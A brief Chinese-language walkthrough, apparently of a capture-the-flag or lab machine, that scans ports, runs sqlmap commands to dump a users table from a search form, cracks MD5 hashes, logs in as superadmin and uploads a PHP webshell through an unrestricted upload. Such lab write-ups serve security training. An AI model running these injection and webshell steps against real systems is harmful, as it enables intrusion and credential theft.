搭建环境
在kali扫描IP
扫描端口
开启了22和80端口,在网页端进行访问
目录扫描
然后发现一个登录页面和一个注册页面
我们先注册一个账号,然后登录
是一个搜索框,可以尝试XSS和SQL注入.
SQL注入
直接用SQLmap(post)跑
python3 sqlmap.py -r 1.txt -batch
存在时间注入和联合注入
python3 sqlmap.py -r 1.txt -dbs -batch
拿到数据库名称
获取表名
python3 sqlmap.py -r 1.txt -D webapphacking -tables -batch
下载user表
python3 sqlmap.py -r 1.txt -D webapphacking -T users --dump -batch
解密MD5密码 Uncrackable
使用superadmin登录之后,页面变成这样
我们尝试上传马子,这边没有做文件类型限制
直接访问 http://192.168.184.153/uploads/1.php 出现空白页面